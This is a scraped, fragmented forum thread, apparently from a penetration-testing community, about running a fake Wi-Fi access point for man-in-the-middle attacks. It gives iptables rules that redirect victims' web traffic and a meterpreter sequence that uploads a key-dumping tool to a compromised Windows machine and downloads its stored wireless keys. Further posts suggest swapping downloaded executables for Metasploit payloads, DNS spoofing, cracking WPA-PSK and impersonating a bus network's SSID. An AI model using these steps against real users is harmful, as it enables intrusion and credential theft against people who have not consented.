IPTABLES -P INPUT ACCEPT
IPTABLES -P FORWARD ACCEPT
IPTABLES -P OUTPUT ACCEPT
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1
Great script works well
Runs meterpreter scripts just great
How I downloaded the wireless keys from the client
meterpreter> upload /xxxx/xxx/wkv.exe wkv.exe
(this uploads to c:/WINDOWS/system32 )
meterpreter> run multicommand –c “c:\\WINDOWS\\system32\\wkv /stext wirecodes.txt”
(this saves wirecodes.txt to c:\\WINDOWS\\system32)
meterpreter> download c:\\WINDOWS\system32\\wirecodes.txt /tmp
now view the downloaded file
Wireless Key Harvester --- including video - Remote Exploit Forums
This script doesn't automate it, so you have to do it all yourself
Anyway, it looks like you ca upload, create and download the keys.
So your wanting help with viewing it?! :S
look in /tmp/! Use nano, vi , cat or kate to veiw the file!
sorry I didn't make my self clear
I can view it NO problem using kwrite or less.
thanks for reply, Just tring to show others how I did it after months of trying
I have tried the script you suggest but I failed.
add this to the top, to stop any current process
killall -9 airbase-ng dhcpd3 apache2 wicd-client
this way we can easily re-run the script multiple times
wicd is killed to prevent channel hopping,
All that just to do MITM attack on open wifi !?
my short ugly hack : Replace *.EXE with MSF payload .. - Remote Exploit Forums
you can also look at 'mass client side attack' or file pwn or wifizoo karmetasploit you could also DNS spoof to at least have it look like MSN etc when downloading the update... list goes on and on
MSF meterpreter cheat sheet
Glad that it work for you!
I've seen and used FastTrack’s "mass client side attack". But I haven’t heard of "file pwn" (unless you mean replacing the exes with "our" exes). I've currently recorded videos for "WiFiZoo" & "karmetasploit" but haven't had the time to edit.
I know the list goes on! I just couldn’t be bothered to add it all in! Plus it’s harder to automate some of those programs, which was the idea of this script. And for the record, you could use Wireshark, and view all the data; I just chose those programs because of ease and automation/scripting.
I do like the idea of monitoring other traffic that isn’t on port 80, before they download the payload, and I'll see what I can do (if you have any other hints like this, please say! :))
and thanks for the cheat sheet, but isn't scripting a little bit different?
And to add to g0tmi1k's statement there, a fake AP lets you put out a "linksys" ssid and get everyone automatically connecting to it, connecting to someone else's AP doesn't help you much. You can also use this to intercept and half-crack WPA points from companies using WPA-PSK.
Or, if you're in my city, you can put out the bus AP SSID and watch them all dump onboard video data to you (no longer a possibility thankfully, but it illustrates my point nicely).